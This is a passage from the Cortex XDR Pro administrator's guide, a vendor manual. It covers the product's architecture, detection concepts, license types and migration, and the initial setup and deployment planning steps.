Cortex XDR™ Pro Administrator’s Guide

paloaltonetworks.com/documentation
Contact Information
Corporate Headquarters:
Palo Alto Networks
3000 Tannery Way
Santa Clara, CA 95054
www.paloaltonetworks.com/company/contact-support

About the Documentation

• For the most recent version of this guide or for access to related documentation, visit the Technical
Documentation portal www.paloaltonetworks.com/documentation.
• To search for a specific topic, go to our search page www.paloaltonetworks.com/documentation/
document-search.html.
• Have feedback or questions for us? Leave a comment on any page in the portal, or write to us at
[email protected].

Copyright
Palo Alto Networks, Inc.
www.paloaltonetworks.com

© 2018-2020 Palo Alto Networks, Inc. Palo Alto Networks is a registered trademark of Palo
Alto Networks. A list of our trademarks can be found at www.paloaltonetworks.com/company/
trademarks.html. All other marks mentioned herein may be trademarks of their respective companies.

Last Revised
November 2, 2020

2 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE |

Table of Contents
Cortex XDR™ Overview....................................................................................9
Cortex XDR Architecture........................................................................................................................11
Cortex XDR Concepts..............................................................................................................................13
XDR.................................................................................................................................................. 13
Sensors............................................................................................................................................ 13
Log Stitching.................................................................................................................................. 13
Causality Analysis Engine...........................................................................................................14
Causality Chain............................................................................................................................. 14
Causality Group Owner (CGO)................................................................................................. 14
Cortex XDR Licenses............................................................................................................................... 15
Features by Cortex XDR License Type...................................................................................15
Cortex XDR License Allocation.................................................................................................17
Cortex XDR License Expiration................................................................................................ 18
Cortex XDR License Monitoring.............................................................................................. 18
Migrate Your Cortex XDR License.......................................................................................... 20

Get Started with Cortex XDR Pro................................................................25

Set up Cortex XDR Pro Overview........................................................................................................27
Plan Your Cortex XDR Deployment.................................................................................................... 29
Manage Roles.............................................................................................................................................30
Predefined User Roles for Cortex XDR..................................................................................32
Activate your Network Devices............................................................................................................41
Activate Cortex XDR................................................................................................................................42
Set Up Directory Sync.............................................................................................................................45
Pairing Directory Sync................................................................................................................ 45
Allocate Log Storage for Cortex XDR................................................................................................. 47
Set up Endpoint Protection....................................................................................................................50
Plan Your Agent Deployment................................................................................................... 51
Enable Access to Cortex XDR.................................................................................................. 52
Proxy Communication................................................................................................................. 57
Set up Network Analysis.........................................................................................................................58
Configure Cortex XDR.............................................................................................................................59
Integrate External Threat Intelligence Services.................................................................... 60
Set up Your Cortex XDR Environment...................................................................................61
Set up Outbound Integration.................................................................................................................63
Use the Cortex XDR Interface.............................................................................................................. 64
Manage Tables.............................................................................................................................. 65

Endpoint Security..............................................................................................71
Endpoint Security Concepts...................................................................................................................73
About Cortex XDR Endpoint Protection................................................................................ 73
File Analysis and Protection Flow............................................................................................76
Endpoint Protection Capabilities.............................................................................................. 79
Endpoint Protection Modules................................................................................................... 82
Manage Cortex XDR Agents..................................................................................................................90
Create an Agent Installation Package..................................................................................... 90
Set an Application Proxy for Cortex XDR Agents............................................................... 92
Move Cortex XDR Agents Between Managing XDR Servers............................................93

TABLE OF CONTENTS iii

 Upgrade Cortex XDR Agents.................................................................................................... 94
Delete Cortex XDR Agents........................................................................................................96
Uninstall the Cortex XDR Agent.............................................................................................. 96
Set an Alias for an Endpoint..................................................................................................... 97
Define Endpoint Groups......................................................................................................................... 98
About Content Updates........................................................................................................................100
Endpoint Security Profiles....................................................................................................................101
Add a New Exploit Security Profile...................................................................................... 102
Add a New Malware Security Profile................................................................................... 106
Add a New Restrictions Security Profile..............................................................................114
Manage Security Profiles......................................................................................................... 115
Customizable Agent Settings...............................................................................................................117
Add a New Agent Settings Profile........................................................................................ 120
Configure Global Agent Settings........................................................................................... 125
Endpoint Data Collected by Cortex XDR............................................................................ 126
Apply Security Profiles to Endpoints.................................................................................................134
Exceptions Security Profiles................................................................................................................ 136
Add a New Exceptions Security Profile............................................................................... 137
Add a Global Endpoint Policy Exception............................................................................. 138
Hardened Endpoint Security............................................................................................................... 146
Device Control............................................................................................................................147
Host Firewall............................................................................................................................... 153
Disk Encryption.......................................................................................................................... 158
Host Inventory............................................................................................................................163
Vulnerability Assessment......................................................................................................... 168

Investigation and Response......................................................................... 173

Cortex XDR Indicators.......................................................................................................................... 175
Working with BIOCs................................................................................................................. 175
Working with IOCs....................................................................................................................182
Manage Existing Indicators..................................................................................................... 186
Search Queries........................................................................................................................................ 189
Cortex XDR Query Builder......................................................................................................189
Cortex XDR Query Center...................................................................................................... 218
Quick Launcher...........................................................................................................................222
Cortex XDR Scheduled Queries.............................................................................................223
Research a Known Threat....................................................................................................... 225
Investigate Incidents.............................................................................................................................. 226
External Integrations................................................................................................................. 229
Manage Incident Starring.........................................................................................................231
Create an Incident Scoring Rule............................................................................................ 232
Investigate Artifacts and Assets......................................................................................................... 235
Investigate an IP Address........................................................................................................ 235
Investigate an Asset.................................................................................................................. 238
Investigate a File and Process Hash..................................................................................... 239
Investigate Alerts.................................................................................................................................... 243
Cortex XDR Alerts.....................................................................................................................243
Triage Alerts................................................................................................................................ 251
Manage Alerts.............................................................................................................................251
Alert Exclusions.......................................................................................................................... 255
Causality View............................................................................................................................ 257
Network Causality View.......................................................................................................... 260
Timeline View............................................................................................................................. 263
Analytics Alert View..................................................................................................................264

iv TABLE OF CONTENTS
 Investigate Endpoints............................................................................................................................ 267
Action Center..............................................................................................................................267
View Details About an Endpoint........................................................................................... 271
Retrieve Files from an Endpoint............................................................................................ 276
Retrieve Support Logs from an Endpoint............................................................................ 278
Scan an Endpoint for Malware...............................................................................................278
Investigate Files...................................................................................................................................... 281
Manage File Execution............................................................................................................. 281
Manage Quarantined Files...................................................................................................... 282
Review WildFire Analysis Details.......................................................................................... 283
Import File Hash Exceptions...................................................................................................286
Response Actions................................................................................................................................... 287
Initiate a Live Terminal Session..............................................................................................288
Isolate an Endpoint....................................................................................................................293
Remediate Changes from Malicious Activity...................................................................... 294
Run Scripts on an Endpoint.................................................................................................... 296
Search and Destroy Malicious Files...................................................................................... 308
Manage External Dynamic Lists.............................................................................................311

Broker VM........................................................................................................315
Broker VM Overview............................................................................................................................ 317
Set up Broker VM.................................................................................................................................. 318
Configure the Broker VM........................................................................................................318
Activate the Agent Proxy........................................................................................................ 329
Activate the Syslog Collector................................................................................................. 329
Activate the Network Mapper............................................................................................... 331
Activate Pathfinder....................................................................................................................333
Activate the Windows Event Collector................................................................................338
Manage Your Broker VMs................................................................................................................... 347
View Broker VM Details.......................................................................................................... 347
Edit Your Broker VM Configuration..................................................................................... 349
Collect Broker VM Logs...........................................................................................................350
Reboot a Broker VM.................................................................................................................351
Upgrade a Broker VM.............................................................................................................. 351
Open Remote Terminal............................................................................................................ 351
Remove a Broker VM............................................................................................................... 353
Broker VM Notifications.......................................................................................................................354

External Data Ingestion................................................................................ 355

External Data Ingestion Vendor Support......................................................................................... 357
Visibility of Logs and Alerts from External Sources in Cortex XDR........................................... 359
Ingest Network Connection Logs.......................................................................................................363
Ingest Logs from Check Point Firewalls...............................................................................363
Ingest Logs from Cisco ASA Firewalls..................................................................................364
Ingest Logs from Fortinet Fortigate Firewalls.................................................................... 364
Ingest Logs from Corelight Zeek........................................................................................... 365
Ingest Authentication Logs and Data................................................................................................367
Ingest Logs from Microsoft Azure AD................................................................................. 367
Ingest Authentication Logs and Data from Okta...............................................................368
Ingest Authentication Logs from PingFederate..................................................................369
Ingest Authentication Logs and Data from PingOne........................................................ 370
Ingest Operation and System Logs from Cloud Providers........................................................... 371
Ingest Logs from AWS CloudTrail and Amazon CloudWatch.........................................371

TABLE OF CONTENTS v
 Ingest Logs and Data from a GCP Pub/Sub....................................................................... 373
Ingest Logs from Google Kubernetes Engine..................................................................... 377
Additional Log Ingestion Methods for Cortex XDR.......................................................................381
Ingest Logs from a Syslog Receiver...................................................................................... 381
Ingest Logs from Elasticsearch Filebeat............................................................................... 381
Ingest External Alerts............................................................................................................................ 384

Analytics............................................................................................................387
Analytics Concepts.................................................................................................................................389
Analytics Engine......................................................................................................................... 389
Analytics Sensors....................................................................................................................... 390
Coverage of the MITRE Attack Tactics................................................................................391
Analytics Detection Time Intervals....................................................................................... 393
Analytics Alerts and Analytics BIOCs................................................................................... 395

Asset Management........................................................................................ 397

About Asset Management....................................................................................................................399
Configure Your Network Parameters................................................................................................400
Define IP Address Ranges....................................................................................................... 400
Define Domain Names............................................................................................................. 401
Manage Your Network Assets............................................................................................................ 402

Monitoring........................................................................................................405
Cortex XDR Dashboard........................................................................................................................ 407
Dashboard Widgets...................................................................................................................407
Manage Your Widget Library................................................................................................. 413
Predefined Dashboards............................................................................................................ 415
Build a Custom Dashboard......................................................................................................418
Manage Dashboards..................................................................................................................420
Run or Schedule Reports......................................................................................................... 420
Monitor Cortex XDR Incidents........................................................................................................... 422
Monitor Administrative Activity......................................................................................................... 424
Monitor Agent Activity......................................................................................................................... 426
Monitor Agent Operational Status.....................................................................................................429

Log Forwarding............................................................................................... 431

Log Forwarding Data Types................................................................................................................ 433
Integrate Slack for Outbound Notifications.................................................................................... 434
Integrate a Syslog Receiver................................................................................................................. 436
Configure Notification Forwarding.................................................................................................... 438
Cortex XDR Log Notification Formats.............................................................................................. 440
Alert Notification Format.........................................................................................................440
Agent Audit Log Notification Format................................................................................... 449
Management Audit Log Notification Format......................................................................450
Cortex XDR Log Format for IOC and BIOC Alerts............................................................452
Cortex XDR Analytics Log Format.........................................................................................460
Cortex XDR Log Formats.........................................................................................................465

Managed Security...........................................................................................493
About Managed Security...................................................................................................................... 495

vi TABLE OF CONTENTS
Cortex XDR Managed Security Access Requirements.................................................................. 496
Set up Managed Threat Hunting........................................................................................................497
Pair a Parent Tenant with Child Tenant........................................................................................... 499
Pairing a Parent and Child Tenant.........................................................................................499
Unpairing a Parent and Child Tenant................................................................................... 500
Manage a Child Tenant.........................................................................................................................501
Track your Tenant Management............................................................................................501
Investigate Child Tenant Data................................................................................................502
Create and Allocate Configurations...................................................................................... 503
Create a Security Managed Action....................................................................................... 504

TABLE OF CONTENTS vii

viii TABLE OF CONTENTS
Cortex XDR™ Overview
The Cortex XDR™ app offers you complete visibility over network traffic, user behavior, and
endpoint activity. It simplifies threat investigation by correlating logs from your sensors to
reveal threat causalities and timelines. This enables you to easily identify the root cause of
every alert. The app also allows you to perform immediate response actions. Finally, to stop
future attacks, you can pro-actively define IOCs and BIOCs to detect and respond to malicious
activity.

> Cortex XDR Architecture

> Cortex XDR Concepts
> Cortex XDR Licenses

9
10 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview
© 2020 Palo Alto Networks, Inc.
Cortex XDR Architecture

Cortex XDR consumes data from the Cortex Data Lake and can correlate and stitch together logs across
your different log sensors to derive event causality and timelines. A Cortex XDR deployment which uses the
full set of sensors can include the following components:
• Cortex XDR—The Cortex XDR app provides complete visibility into all your data in the Cortex Data Lake.
The app provides a single interface from which you can investigate and triage alerts, take remediation
actions, and define policies to detect the malicious activity in the future.
• Cortex Data Lake—A cloud-based logging infrastructure that allows you to centralize the collection and
storage of logs from your log data sources.
• Cortex XDR Pro per TB:
• Analytics engine—The Cortex XDR analytics engine is a security service that utilizes network data
to automatically detect and report on post-intrusion threats. The analytics engine does this by
identifying good (normal) behavior on your network, so that it can notice bad (anomalous) behavior.
• Palo Alto Networks next-generation firewalls—On-premise or virtual firewalls that enforce network
security policies in your campus, branch offices, and cloud data centers.
• Palo Alto Networks Prisma Access and GlobalProtect—If you extend your firewall security policy
to mobile users and remote networks using Prisma Access or GlobalProtect, you can also forward
related traffic logs to Cortex Data Lake. The analytics engine can then analyze those logs and raise
alerts on anomalous behavior.
• External firewalls and alerts—Cortex XDR can ingest traffic logs from external firewall vendors—such
as Check Point—and use the analytics engine to analyze those logs and raise alerts on anomalous
behavior. For additional context in your incidents, you can also send alerts from external alert
sources.
• Cortex XDR Pro per Endpoint:
• Analytics engine—The Cortex XDR analytics can also consume endpoint data to automatically detect
and report on post-intrusion threats. The analytics engine can use endpoint data to raise alerts for
abnormal network behavior (for example port scan activity).
• Cortex XDR agents—Protects your endpoints from known and unknown malware and malicious
behavior and techniques. Cortex XDR agents perform its own analysis locally on the endpoint but
also consumes WildFire threat intelligence. The Cortex XDR agent reports all endpoint activity to the
Cortex Data Lake for analysis by Cortex XDR apps.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 11

© 2020 Palo Alto Networks, Inc.
 • External alert sources—To add additional context to your incidents, you can send Cortex XDR alerts
from external sources using the Cortex XDR API.

12 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
Cortex XDR Concepts
• XDR
• Sensors
• Log Stitching
• Causality Analysis Engine
• Causality Chain
• Causality Group Owner (CGO)
• Analytics Concepts

XDR
With Endpoint Detection and Response (EDR), enterprises rely on endpoint data as a means to trigger
cybersecurity incidents. As cybercriminals and their tactics have become more sophisticated, the time
to identify and contain breaches has only increased. XDR goes beyond the traditional EDR approach of
using only endpoint data to identify and respond to threats by applying machine learning across all your
enterprise, network, cloud, and endpoint data. This approach enables you to quickly find and stop targeted
attacks and insider abuse and remediate compromised endpoints.

Sensors
Cortex XDR™ uses your existing Palo Alto Networks products as sensors to collect logs and telemetry data.
The sensors that are available to you depend on your Cortex XDR license type.
With a Cortex XDR Pro per TB license, a sensor can be any of the following:
• Virtual (VM-Series) or physical firewalls—Identifies known threats in your network and cloud data center
environments
• Prisma Access or GlobalProtect—Identifies known threats in your mobile user and remote network
traffic
• External vendors—You can forward logs from supported vendors and additional vendors that adhere to
required formats.
With a Cortex XDR Pro per Endpoint license, a sensor can be any of the following:
• Cortex XDR agents—Identifies threats on your Windows, Mac, Linux, and Android endpoints and halts
any malicious behavior or files
While more sensors increases the amount of data Cortex XDR can analyze, you only need to deploy one
type of sensor to begin detecting and stopping threats with Cortex XDR.

Log Stitching
To provide a complete and comprehensive picture of the events and activity surrounding an event, Cortex
XDR™ correlates together firewall network logs, endpoint raw data, and cloud data across your detection
sensors. The act of correlating logs from different sources is referred to as log stitching and helps you
identify the source and destination of security processes and connections made over the network.
Log stitching allows you to:
• Run investigation queries based on stitched network and endpoint logs
• Create granular BIOC rules over logs from Palo Alto Networks Next-Generation Firewalls and raw
endpoint data
• Investigate correlated network and endpoint events in the Network Causality View

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 13

© 2020 Palo Alto Networks, Inc.
 Log stitching streamlines detection and reduces response time by eliminating the need for manual analysis
across different data sensors. Stitching data across the firewalls and endpoints allows you to obtain data
form different sensors in a unified view, each sensor adding another layer of visibility. For example, when
a connection is seen through the firewall and the endpoint, the endpoint can provide information on the
processes involved and on the chain of execution while the firewall can provide information on the amount
of data transferred over the connection and the different app ids involved.

Causality Analysis Engine

The Causality Analysis Engine correlates activity from all detection sensors to establish causality chains
that identify the root cause of every alert. The Causality Analysis Engine also identifies a complete forensic
timeline of events that helps you to determine the scope and damage of an attack, and provide immediate
response. The Causality Analysis Engine determines the most relevant artifacts in each alert and aggregates
all alerts related to an event into an incident.

Causality Chain
When a malicious file, behavior, or technique is detected, Cortex XDR™ correlates available data across
your detection sensors to display the sequence of activity that led to the alert. This sequence of events is
called the causality chain. The causality chain is built from processes, events, insights, and alerts associated
with the activity. During alert investigation you should review the entire causality chain to fully understand
why the alert occurred.

Causality Group Owner (CGO)

The Causality Group Owner (CGO) is the process in the causality chain that the Causality Analysis Engine
identified as being responsible for or causing the activities that led to the alert.

14 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
Cortex XDR Licenses
• Features by Cortex XDR License Type
• Cortex XDR License Allocation
• Cortex XDR License Expiration
• Cortex XDR License Monitoring
• Migrate Your Cortex XDR License

Features by Cortex XDR License Type

The following table describes the capabilities associated with each Cortex XDR license type. You can
use either Cortex XDR Prevent or a Cortex XDR Pro license. There are two types of Pro licenses, Cortex
XDR Pro per Endpoint and Cortex XDR Pro per TB, that you can use independently or together for more
complete coverage. If you do not know which license type you have, see Cortex XDR License Monitoring.

Feature Cortex XDR Prevent Cortex XDR Pro per Cortex XDR Pro per TB
Endpoint

Log storage • Minimum of 200 • Minimum of 200 Minimum 5TB log

endpoints endpoints storage
• 30 day log retention • 30 day log retention

Cortex XDR Add-on Licenses

Add-on licenses are required on top of a Cortex XDR license

Host Insights, including: — —

• Host Inventory Without the add-on
• Vulnerability license, Host Insights is
Assessment available with Cortex
• File Search and XDR Pro per Endpoint
Destroy for a 1-month trial
period.

Endpoint Prevention Features

Endpoint management —

Device control —

Host firewall —

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 15

© 2020 Palo Alto Networks, Inc.
 Feature Cortex XDR Prevent Cortex XDR Pro per Cortex XDR Pro per TB
Endpoint

Disk encryption —

Response Actions

Live Terminal —

Endpoint isolation —

External dynamic list —

(EDL)

Script execution — —

Remediation analysis — —

Incident Scoring Rules —

Featured Alert Fields —

Widget Library —

Analysis

Analytics —

Alert and Log Ingestion

Cortex XDR agent —

alerts

Enhanced data — —
collection for EDR and
other Pro features

Other alerts (from Palo —

Alto Networks and
(API)
third-party sources)

Other logs (from Palo — —

Alto Networks and
third-party sources)

Integrations

Threat intelligence
(AutoFocus, VirusTotal)

Outbound integration
and notification
+ agent audit logs + agent audit logs

16 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
 Feature Cortex XDR Prevent Cortex XDR Pro per Cortex XDR Pro per TB
Endpoint
forwarding (Slack,
Syslog)

Broker VM

Agent Proxy

Syslog Collector

Network Mapper

Pathfinder

Windows Event
Collector

MSSP

MSSP (requires
additional MSSP
license)

Managed Threat — —
Hunting (requires an
+ a minimum of 500
additional Managed
endpoints
Threat Hunting License)

Cortex XDR License Allocation

• Enforcement of Cortex XDR Pro Agent Licenses
• License Revocation

Enforcement of Cortex XDR Pro Agent Licenses

For the Cortex XDR Pro per Endpoint license, Cortex XDR limits the number of Pro agents and associated
Pro capabilities to the number of agents allocated by the license. Pro agent features include:
• Enhanced Data Collection on the endpoint
• Remediation analysis
• Host Insights including Vulnerability Assessment, Host Inventory, and File Search and Destroy
You can further refine the endpoints on which you enable Pro features in your agent settings profiles.
After utilizing all available Pro licenses, Cortex XDR falls back to a Cortex XDR Prevent policy that protects
the endpoint but does not include Pro-specific capabilities. When you exceed the permitted number of Pro
agents, Cortex XDR displays a notification in the notification area. Cortex XDR permits a small grace over
the permitted number but begins enforcing the number of agents after 14 days. If additional Pro agents are
required, increase your Cortex XDR Pro per Endpoint license capacity.
To view the Pro license status for specific endpoints, see the View Details About an Endpoint.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 17

© 2020 Palo Alto Networks, Inc.
License Revocation
With Cortex XDR Prevent and Cortex XDR Pro per Endpoint licenses, Cortex XDR manages licensing for all
endpoints in your organization. Each time you install a new Cortex XDR agent on an endpoint, the Cortex
XDR agent registers with Cortex XDR to obtain a license. In the case of non-persistent VDI, the Cortex XDR
agent registers with Cortex XDR as soon as the user logs in to the endpoint.
Cortex XDR issues licenses until you exhaust the number of license seats available. Cortex XDR also
enforces a license cleanup policy to automatically return unused licenses to the pool of available licenses.
The time at which a license returns to the license pool depends on the type of endpoint:

Endpoint Type License Return Agent Removal from Agent Removal from
Cortex XDR console Cortex XDR Database

Standard and mobile After 30 days After 180 days After 180 days
devices

(Non-Persistent) Immediately after log-off After 6 hours After 7 days

VDI and Temporary for VDI, otherwise after 90
Session minutes

After a license is revoked, if the agent connects to Cortex XDR, reconnection will succeed as long as the
agent has not been deleted.
After an agent is deleted, the agent ID and all the relevant agent data are deleted from the Cortex XDR
database. If the agent connects to Cortex XDR after it was deleted from the database, the agent is assigned
a new ID and a fresh start.

It can take up to an hour for Cortex XDR to display revived endpoints.

Cortex XDR License Expiration

Cortex XDR licenses are valid for the period of time associated with the license purchase. After your Cortex
XDR license expires, Cortex XDR allows access to your tenant for an additional grace period of 48 hours.
After the 48-hour grace period, Cortex XDR disables access to the Cortex XDR app until you renew the
license.
For the first 30 days of your expired license, Cortex XDR continues to protect your endpoints and/or
network and retains data in the Cortex Data Lake according to your Cortex Data Lake data retention policy
and licensing. After 30 days, the tenant is decommissioned and agent prevention capabilities cease.

Cortex XDR License Monitoring

From the > Cortex XDR License dialog, you can view the license type associated with your Cortex XDR
instance.

18 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
For each license, Cortex XDR displays a tile that has the expiration date of your license and additional
details specific to your license type:

License Tile Details

Cortex XDR Prevent Displays the total number of concurrent agents

permitted by your license. You can also view a graph of
the current license allocation (total and percentage).

Cortex XDR Pro per Endpoint Displays the total number of installed agents in addition
to the number and percentage of agents with Pro
features enabled. Below the license tile, you can also
view the storage retention policy, total amount of
storage allocated for enhanced data collection, and the
actual data usage.

Cortex XDR Pro per TB Displays the amount of total storage included with your
license and the amount of storage used.

Combination of Cortex XDR Pro per Cortex XDR Pro per Endpoint displays the total number
Endpoint and Cortex XDR Pro per TB of installed agents, while Cortex XDR Pro per TB displays
how many agents are enabled with endpoint data
collection, allowing them to collect and send data to the
server.

Add-Ons

Host Insights Displays the expiration of the license.

To keep you informed of updates made to your license and avoid service disruptions, Cortex XDR displays
license notifications when you log in. The notification identifies any changes made to your license and
describes any required actions.
Cortex XDR also indicates when you have exceeded your Cortex XDR Pro per Endpoint license capacity.
To view the Pro license status for specific endpoints, see the View Details About an Endpoint. For more
information, see Enforcement of Cortex XDR Pro Agent Licenses.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 19

© 2020 Palo Alto Networks, Inc.
Migrate Your Cortex XDR License
As part of the migration of Cortex XDR 1.0 to Cortex XDR 2.0, a new Cortex XDR licensing structure will go
into effect. The new licensing structure allows you to better view and manage how your network data and
endpoints are best utilized across your organization.
Cortex XDR 1.0 license was based on the amount of terabyte (TB) used for either:
• 1TB = 200 Pro per Endpoints (with EDR Collection)
Or
• 1TB = 1TB of network traffic analysis/third party data + 200 Prevent Endpoints (without EDR collection)
The Cortex XDR 2.0 license structure is based on three Cortex XDR Licenses that you can purchase
individually or as a combination. The endpoint licenses provide the number of permitted agents, either
Prevent or Pro. The TB license identifies the amount of TB used for network traffic analysis and collecting
third-party data:
• Cortex XDR Prevent license—Number of Prevent Endpoints (without EDR collection)
• Cortex XDR Pro per Endpoint license—Number of Pro Endpoints (with EDR collection)
• Cortex XDR Pro per TB license—Amount of network data used for network traffic analysis and third-
party data.

License Conversion Method and Example

Converting Cortex XDR 1.0 license to a Cortex XDR 2.0 license is calculated as follows:

License Type Calculation

Endpoints • For each Cortex 1.0 license, 1 TB = 200 Pro per Endpoints (with EDR
collection).
The number of endpoints is converted based on the quota allocated in
Hub > Cortex Data Lake > Cortex XDR > Endpoint XDR Data, previously
Traps > Endpoint Data.

Network Data • For each Cortex XDR 1.0 license, 1 TB = 1 TB of network data.

Since XDR 2.0 pro per TB license no longer includes

Prevent endpoints, the license does not reflect them,
however, you can keep using them until your renewal.

After migration of Cortex 2.0, when navigating to > Cortex XDR License, the license displays the
converted amounts of network data or its equivalent number of endpoints allocated to your license. The
following table displays a conversion comparison between Cortex XDR 1.0 and 2.0 licenses.

License Version License Details

Cortex XDR 1.0 License • Cortex XDR 1.0 PAN-MGFR-XDR-1TB license - 100TB
• Hub > Cortex Data Lake > Traps > Endpoint Data - 10TB Endpoint Data.

Post Migration Cortex • Up to 20,000 Pro per Endpoints

XDR 2.0 License • Up to 100TB for network traffic analysis and third-party data

20 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
Convert Your Cortex XDR License
When your Cortex XDR app is migrated to Cortex XDR 2.0, we recommend you convert your Cortex XDR
license to align with the new structure. To apply the new license structure, determine how the amount of
network data and number of endpoints are distributed across your organization.

After you convert your legacy license to Cortex XDR 2.0 license structure, your new network
and endpoint allocation are applied immediately. You can edit the allocation at any time,
however, after you convert to the new license structure you cannot revert to your legacy
license.

STEP 1 |
In Cortex XDR app, select > Cortex XDR License.

• (1) Network quota in TB and qualifying number of Pro per Endpoints

• (2,3) Number of agents installed and enabled to collect EDR data in your organization based on the
quota allocated in Hub > Cortex Data Lake > Cortex XDR > Endpoint XDR Data.
• (4) Current number of days Cortex XDR retains your data.

STEP 2 | Convert your Cortex XDR 1.0 license to Cortex XDR 2.0 license.
1. Select Convert License.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 21

© 2020 Palo Alto Networks, Inc.
 2. Use the Network Allocation slide bar to allocate your license between network and endpoints (1
network TB = 200 endpoints).

If you allocate all of your license to network data then you disable endpoint capabilities
(and vice versa).
3. Apply your new license allocations.

STEP 3 | In your new Cortex XDR 2.0 license, review or Edit your license allocation:
• Number of Cortex XDR agents
• Amount of network TB
• Number of installed endpoints and endpoints enabled with EDR Data collection according to the
number of agents allocated to your license, rather than the Cortex Data Lake distribution.
• Number of days remaining for Cortex XDR to retain your data.

22 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview

© 2020 Palo Alto Networks, Inc.
STEP 4 | Should you require additional TB or agent coverage, contact your Sales representative.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview 23

© 2020 Palo Alto Networks, Inc.
24 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Cortex XDR™ Overview
Get Started with Cortex XDR Pro
> Set up Cortex XDR Pro Overview

25
26 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Set up Cortex XDR Pro Overview
Before you can use Cortex XDR for advanced detection and response, you must activate the Cortex XDR
app and set up related apps and services. You must perform the setup activities as shown in the following
image. Some steps are required only if you have the corresponding license type.

STEP 1 | Plan Your Cortex XDR Deployment.

As part of your planning, ensure that you or the person who is activating Cortex apps has the
appropriate roles.

STEP 2 | (Cortex XDR Pro per TB license only) Activate your Network Devices.

STEP 3 | Activate Cortex XDR and related apps and services.

1. Locate the email that contains your activation information.
2. Activate Cortex XDR.
3. Activate Cortex Data Lake (if not using an existing instance).
4. (Optional) Create a Directory Sync Service instance
5. Review log storage.

STEP 4 | (Cortex XDR Pro per Endpoint only) Set up Endpoint Protection.
1. Plan your Cortex XDR agent deployment.
2. Create Cortex XDR agent installation packages
3. Define endpoint groups.
4. Deploy the Cortex XDR agent to your endpoints.
5. Configure your endpoint security policy.

STEP 5 | (Cortex XDR Pro per TB license only) Set up Network Analysis.
1. Perform any remaining setup of your network sensors.
2. Configure the internal networks that you want Cortex XDR to monitor.
3. Verify that Cortex XDR is receiving alerts.
4. If you set up a Directory Sync Service instance, enable Cortex XDR to use it.

STEP 6 | Configure Cortex XDR.

1. (Optional) Integrate additional threat intelligence.
2. After 24 hours, enable Cortex XDR Analytics Analysis.
1. Configure Network Coverage.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 27
© 2020 Palo Alto Networks, Inc.
 2. (Recommended) Activate Pathfinder to interrogate endpoints that do not have the Cortex XDR
agent installed.
3. Define alert exclusions.
4. Prioritize incidents based on attributes by creating an incident starring policy.
5. Import or configure rules for known BIOC and IOCs.
6. (Optional) Manage External Dynamic Lists- Requires a Cortex XDR Pro per TB license.

STEP 7 | (Optional) Set up Outbound Integration.

• Integrate with Slack
• Integrate with a Syslog Server
• Integrate with Cortex XSOAR

STEP 8 | (Optional) Set up Managed Security

STEP 9 | Use the Cortex XDR Interface.

28 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Plan Your Cortex XDR Deployment
Before you get started with Cortex XDR™, plan your deployment:

Deployment Type Deployment Considerations

New Cortex XDR Use the Cortex Data Lake Calculator to determine the amount of log
tenants storage you need for your Cortex XDR deployment. Talk to your Partner
or Sales Representative to determine whether you must purchase
additional Cortex Data Lake storage.
Determine the region in which you want to host Cortex XDR and any
associated services, such as Cortex Data Lake and Directory Sync Service:
• US—All Cortex XDR logs and data remain within the US boundary.
• UK—All Cortex XDR logs and data remain within the UK boundary.
• EU—All Cortex XDR logs and data remain within the Europe boundary.
• SG—All Cortex XDR logs and data remain within the Singapore
boundary.
• JP—All Cortex XDR logs and data remain within the Japan boundary.
• CA—All Cortex XDR logs and data remain within the Canada boundary.
However, if you have a WildFire Canada cloud subscription, consider
the following:
• You can not send file submissions for bare-metal analysis.
• You will not be protected against macOS-borne zero-day threats.
However, you will receive protections against other macOS
malware in regular WildFire updates.
• You will not be able to see file submissions in AutoFocus.
• AU—All Cortex XDR logs and data remain within the Australia
boundary except WildFire file submissions, which Cortex XDR sends to
the WildFire Singapore Cloud for analysis.
(Cortex XDR Pro per Endpoint license only) Calculate the bandwidth
required to support the number of agents you plan to deploy. You
need 1.2Mbps of bandwidth for every 1,000 agents. The bandwidth
requirement scales linearly so, for example, to support 100,000 agents,
you need to allocate 120Mbps of bandwidth.
Manage Roles to ensure you or the person who is activating Cortex apps
has the appropriate permissions.
When you are ready to get started with a new tenant, Activate Cortex XDR.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 29
© 2020 Palo Alto Networks, Inc.
Manage Roles
Role-based access control (RBAC) enables you to use roles or specific permissions to assign access rights to
administrative users. You can manage roles for all Cortex apps and services in the hub. By assigning roles,
you enforce the separation of viewing access and initiating actions among functional or regional areas of
your organization. The following options are available to help you manage access rights:
• Assign Predefined User Roles for Cortex XDR
• Create and save new roles based on the granular permission
• Edit role permissions (available for roles you create)
• Assign permissions to users without saving a role
Use roles to assign specific view and action access privileges to administrative user accounts. The way you
